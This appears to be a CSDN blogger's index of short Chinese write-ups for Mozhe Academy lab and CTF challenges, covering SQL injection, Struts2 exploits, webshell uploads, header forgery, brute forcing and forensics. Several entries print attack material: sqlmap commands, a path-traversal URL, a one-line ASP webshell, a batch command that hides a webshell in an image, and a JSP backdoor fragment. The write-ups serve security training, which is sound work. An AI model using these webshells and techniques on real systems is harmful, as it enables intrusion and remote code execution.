![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
墨者学院
Jimmy22
这个作者很懒,什么都没留下…
展开
-
SQL注入漏洞测试(布尔盲注)
停机维护通知发现注入点sqlmap -u http://219.153.49.228:46612/new_list.php?id=1 --current-db 获取到的数据库名是stormgroupsqlmap -u http://219.153.49.228:46612/new_list.php?id=1 -D stormgroup --tables 获取到的表是member和noti...原创 2019-08-08 21:25:02 · 1156 阅读 · 0 评论 -
phpMyAdmin后台文件包含分析溯源
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe根据题意进入访问页弱口令进入,账号root,密码root进入SQL执行使用菜刀连接服务器在根目录下我们发现key.txt文件打开查看...原创 2019-08-20 09:14:45 · 1471 阅读 · 0 评论 -
HTML前端代码分析(暗链)
靶场地址:https://www.mozhe.cn/bug/detail/ZlNHTFFtWHV1cTNXb083eG9SS0hUZz09bW96aGUmozhe根据题意开启靶场环境查看源代码发现链接 http://192.168.1.1/19281028102.php192.168.1.1貌似是是一个内网地址,无法访问,我们把192.168.1.1改成靶场的地址,访问后拿到K...原创 2019-08-20 09:21:49 · 624 阅读 · 0 评论 -
安卓手机文件分析取证(Wi-Fi名称)
靶场地址:https://www.mozhe.cn/bug/detail/K1doaXNFemlxODh1QUQ1WVJyOTZRQT09bW96aGUmozhe根据题意安卓手机WIFI信息保存在data/misc/wifi/wpa_supplicant.conf用txt格式打开,里面的ssid就是WiFi名称,psk为WiFi密码或者直接搜索wpa_supplicant.confs...原创 2019-08-20 09:24:45 · 654 阅读 · 0 评论 -
HTTP动作练习
靶场地址:https://www.mozhe.cn/bug/detail/eld5Z1UvZ0dFRlB3TmxoZVVzbmZJUT09bW96aGUmozhe根据题意启动靶机,点击网页点击静夜思,提示url太长Burp,进行抓包把GET改成POST,添加content-Type:application/x-www-form-urlencoded,获取key...原创 2019-08-20 09:29:23 · 420 阅读 · 0 评论 -
Apache Struts2远程代码执行漏洞(S2-004)复现
靶场地址:https://www.mozhe.cn/bug/detail/WXlXKzdpMHpjZ0JCY1NXdzRUMkhwUT09bW96aGUmozhe根据题意s2-004 是一个目录遍历漏洞我们对…/ 进行二次编码之后可以去越权访问敏感数据,http://219.153.49.228:48842//struts/…%252f…%252f…%252f…%252f…%252f…...原创 2019-08-20 09:32:21 · 757 阅读 · 0 评论 -
Apache Struts2远程代码执行漏洞(S2-016)复现
靶场地址:https://www.mozhe.cn/bug/detail/MkhJb2Jpblh4MkYrMjkrNC84UjZtUT09bW96aGUmozhe根据题意使用工具直接检测,居然没有发现s2-016,看到有046就先利用了Lscat key.txt...原创 2019-08-20 09:55:32 · 1525 阅读 · 0 评论 -
WebShell文件上传漏洞分析溯源(第1题)
靶场地址:https://www.mozhe.cn/bug/detail/cFFrR2MzZis2NGdVSkVMU1RjcDBGQT09bW96aGUmozhe根据题意1.由题意知是后台备份获取shell,可以利用的是一句话木马2.进入靶场,使用弱口令登录3.发现有上传点,上传一句话图片,上传成功后得到路径4.由提示进行备份5.将一句话图片得到的路径填入,名称自己填写6.备份成...原创 2019-08-20 10:39:53 · 352 阅读 · 0 评论 -
内部文件上传系统漏洞分析溯源
靶场地址:https://www.mozhe.cn/bug/detail/Umc0Sm5NMnkzbHM0cFl2UlVRenA1UT09bW96aGUmozhe根据题意进入环境,并试探不存在前端验证Burpsuite抓包,发现是iis6漏洞把upload改成asp结尾,期目录下的所有文件都会被当作asp文件执行上传上菜刀,获取key...原创 2019-08-20 11:00:36 · 133 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第2题)
靶场地址:https://www.mozhe.cn/bug/detail/V3lpVHBBK3l6cHdIOWVhSllWQ1MrZz09bW96aGUmozhe根据题意在本机选择远程桌面连接输入地址:端口输入账号密码开始–>管理工具–>事件查看器–>系统–>选择administrator用户操作的事件(ID:1074)–>可以看到开机关机和注释...原创 2019-08-20 11:05:38 · 514 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第1题)
靶场地址:https://www.mozhe.cn/bug/detail/U1prK3FzNjAydzF1bUpxKzVrUWsvQT09bW96aGUmozhe根据题意远程桌面连接,登录,显示系统隐藏文件,找到所在分区的Recycler文件夹...原创 2019-08-20 11:06:57 · 937 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第3题)
靶场地址:https://www.mozhe.cn/bug/detail/QmMwQlY5L1hva3N5UmZHUmQrdUh1QT09bW96aGUmozhe根据题意远程桌面连接,登录,找到temp文件夹发现key原创 2019-08-20 11:08:54 · 332 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第4题)
靶场地址:https://www.mozhe.cn/bug/detail/aW83b012TW1ySWxKY1Qyc1BOTmxvdz09bW96aGUmozhe根据题意远程桌面连接,登录,发现key原创 2019-08-20 11:10:21 · 870 阅读 · 1 评论 -
CTF-远程电子数据取证-服务器分析(第5题)
靶场地址:https://www.mozhe.cn/bug/detail/a0xMcXN4NXIwOXBPSHJDc21jY0YrZz09bW96aGUmozhe根据题意远程桌面连接,登录,直接搜key。。。原创 2019-08-21 09:02:40 · 364 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第6题)
靶场地址:https://www.mozhe.cn/bug/detail/MTgwalFZcyt4RkhuSGR5cnJ4RHV6UT09bW96aGUmozhe根据题意远程桌面连接,登录,直接搜索得到key原创 2019-08-20 11:13:45 · 197 阅读 · 0 评论 -
远程电子数据取证-服务器分析(第7题)
靶场地址:https://www.mozhe.cn/bug/detail/dW9mRDNDSXBTQkZYSjRXVENSTXp6UT09bW96aGUmozhe根据题意远程桌面连接,登录,工具–查看–(取消勾选)隐藏受保护的操作系统文件C:–拿到key...原创 2019-08-20 11:15:11 · 253 阅读 · 0 评论 -
WebShell文件上传漏洞分析溯源(第2题)
靶场地址:https://www.mozhe.cn/bug/detail/NXNRQnJGa1g1U3lmUTNxMEQ3TUFnUT09bW96aGUmozhe根据题意进入环境查看源码发现有前端过滤火狐浏览器F12,删除onclick节点成功上传一句木马菜刀连接,获取key...原创 2019-08-20 11:19:11 · 138 阅读 · 0 评论 -
PHP代码分析溯源(第1题)
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe根据题意访问页面在线跑出整理下代码是这样的GET[0](_GET[0](GET[0](_POST[1]);和一句话的$_POST[1]传参差不多了, $_GET[0]就是我们的函数名了构造一句话木马,将“0”当成参数...原创 2019-08-20 11:32:09 · 146 阅读 · 0 评论 -
浏览器信息伪造
靶场地址:https://www.mozhe.cn/bug/detail/akpiNHpzUGtObW53Z2hSRUY3WU9lZz09bW96aGUmozhe根据题意进入环境提示使用iPhone手机和2G网络,使用burp suite构造User-Agent,获得key...原创 2019-08-20 11:36:59 · 632 阅读 · 0 评论 -
投票常见漏洞分析溯源
靶场地址:https://www.mozhe.cn/bug/detail/WTNpdGxUS3l4dG9uMFF6ZEs3OEJCdz09bW96aGUmozhe根据题意进入环境使用burp suite构造User-Agent,X-Forwarded-for,attack刷新获取key...原创 2019-08-20 11:40:45 · 880 阅读 · 0 评论 -
CTF-网络数据分析溯源(DNS服务器地址)
根据题意进入环境,下载文件,用wireshark加载wireshark筛选udp.port==53或者DNS使用率最高的就是DNS服务器地址验证ip获得key原创 2019-08-24 10:45:08 · 2244 阅读 · 0 评论 -
CTF-登录密码重置漏洞分析溯源
根据题意进入环境,进入密码重置页面,填写信息根据页面说明里的18868345809已注册,获取短信验证码,然后修改手机号为17101304128,拿到key原创 2019-08-24 10:46:11 · 968 阅读 · 0 评论 -
CTF-日常密码泄露分析溯源
根据题意进入环境,用御剑扫描出后台登录网页http://219.153.49.228:42886/admin/index.php利用社工信息猜测用户名密码,Burp suite 抓包进入爆破,intruder模式下的Cluster bomb爆破构造用户名和密码start进行爆破后,找长度不一样的数据,发现账号密码分别为“xiaojun”“xiaohong0214”,查看报文,获...原创 2019-08-24 10:47:42 · 552 阅读 · 0 评论 -
CTF-Tomcat后台弱口令漏洞利用
根据题意进入环境,随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456登录进去过后,发现有一个上传界面,根据解题方向上传一个war木马即可:war木马的制作过程:jsp木马源码<%if(“023”.equals(request.getParameter(“pwd”))){java.io...原创 2019-08-24 10:49:37 · 2141 阅读 · 0 评论 -
CTF-某防火墙默认口令
根据题意进入环境,发现登录界面,根据解题方向,参考https://blog.51cto.com/yuntaoliu/536451系统默认的用户管理员用户为useradmin,密码为venus.user。用户可以使用这个账号用于配置系统管理员。登录成功获得key...原创 2019-08-24 10:54:18 · 462 阅读 · 0 评论 -
CTF-来源页伪造
根据题意referer的意思简言之,HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。进入环境,提示“禁止浏览!当前页面只允许从google.com访问。”根据解题方向构造referer=google.com,burp suite抓包提交即可拿到key...原创 2019-08-24 10:55:37 · 2124 阅读 · 0 评论 -
热点评论刷分漏洞分析溯源
靶场地址:https://www.mozhe.cn/bug/detail/UWRuRTBMWGFIUFN1ZHBwOUNzeGNyQT09bW96aGUmozhe根据题意进入页面使用burp suite构造X-Forwarded-for,attack,刷新页面获取key原创 2019-08-20 17:51:25 · 247 阅读 · 0 评论 -
PHP代码分析溯源(第2题)
靶场地址:https://www.mozhe.cn/bug/detail/b2JOdEFrV2kvZnhGVy9HQk1wMDhYUT09bW96aGUmozhe根据题意进入页面,下载源码PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他...原创 2019-08-20 17:54:20 · 102 阅读 · 0 评论 -
SQL手工注入漏洞测试(MySQL数据库)
靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe根据题意进入页面找到注入点and 1=1 页面正常and 1=2 页面报错通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。通过SQL语句中order by N 来判...原创 2019-08-20 18:23:38 · 1463 阅读 · 0 评论 -
SQL手工注入漏洞测试(Access数据库)
靶场地址:https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe根据题意进入页面,发现注入点利用and 1=1 =1正常,and 1=2 出现报错说明有注入点猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不...原创 2019-08-20 18:35:33 · 437 阅读 · 0 评论 -
密码学加解密实训(JavaScript分析)
靶场地址:https://www.mozhe.cn/bug/detail/Zm5kdGhqVmFNNkV3UXM2a3JUb3pmUT09bW96aGUmozhe根据题意查看HTML页面的源代码输入获取key原创 2019-08-20 18:38:08 · 281 阅读 · 0 评论 -
密码学加解密实训-隐写术(第1题)
靶场地址:https://www.mozhe.cn/bug/detail/amd6YTVxNGMzYnozcGxGZUdaWnRYQT09bW96aGUmozhe根据题意Javascript禁用鼠标右键,按F12,下载图片,用记事本打开,发现地址输入到地址,获得key...原创 2019-08-20 18:41:08 · 392 阅读 · 0 评论 -
密码学加解密实训(Base64转义)
靶场地址:https://www.mozhe.cn/bug/detail/SW5ObnVFa05vSHlmTi9pcWhRSjRqZz09bW96aGUmozhe根据题意进入页面,查看源码Base64解码输入地址获得key原创 2019-08-20 18:42:56 · 189 阅读 · 0 评论 -
小学生加解密练习
靶场地址:https://www.mozhe.cn/bug/detail/aWpEVjFCNHJoYmU1VE5kanZ0Ylc4QT09bW96aGUmozhe根据题意进入页面,根据提示对照字母表,获得验证值为mozheyes输入后获得key...原创 2019-08-20 18:45:40 · 232 阅读 · 0 评论 -
CTF-投票系统程序设计缺陷分析
根据题意进入环境,提示“请争取窗口“ggg”票数夺取第一名”,burp suite抓包,发送到intruder,构造X-Forwarded-For:172.16. §0§.§1§,构造payloads type从1到255 step为1,开始跑,刷新页面,当ggg第一名时即可获得key...原创 2019-08-24 20:34:06 · 798 阅读 · 0 评论 -
CTF-IP地址伪造(第1题)
根据题意进入环境,根据提示,弱口令和系统设置只允许在服务器上登录。用burp suite抓包,构造X-Forwarded-For:127.0.0.1,进入爆破,登录成功,获得key原创 2019-08-24 20:34:53 · 2743 阅读 · 0 评论 -
CTF-IP地址伪造(第2题)
根据题意进入环境,根据提示“只有台湾地区的ip才能登录。“和测试账号猜测test账号。burp suite进行登录抓包进行弱密码爆破,构造X-Forwarded-For:140.113.215.224 (ip地址是台湾的即可)。点击GO发送,得到网页反馈信息,伪造地区IP地址成功,获得key。...原创 2019-08-24 20:35:56 · 2563 阅读 · 0 评论 -
CTF-WebShell文件上传分析溯源(第1题)
根据题意进入环境,进入后台登录,弱口令 admin/admin 进入后台在添加文章出发现可以上传一句话木马图片生成一句话木马图片准备三个文件1.jpg和1.php和1.bat其中1.php的内容为<%eval request (“cmd”)%>其中1.bat的内容为copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件点击1.bat文件,生...原创 2019-08-24 20:40:39 · 851 阅读 · 0 评论 -
密码学加解密实训-隐写术(第2题)
靶场地址:https://www.mozhe.cn/bug/detail/QUZPelNxRnRkcGRhcmViYVJ1aFRUQT09bW96aGUmozhe根据题意进入页面,下载图片,用winhex打开,发现key输入地址获得key原创 2019-08-20 19:33:46 · 215 阅读 · 0 评论 -
加解密练习(C语言)
靶场地址:https://www.mozhe.cn/bug/detail/MWYvbW0vVy9XWEJHMUxFVVF0cDJNZz09bW96aGUmozhe根据题意进入页面,下载图片与代码,把图片加入到代码中运行,获得一个文件,打开找到key...原创 2019-08-20 19:54:15 · 620 阅读 · 0 评论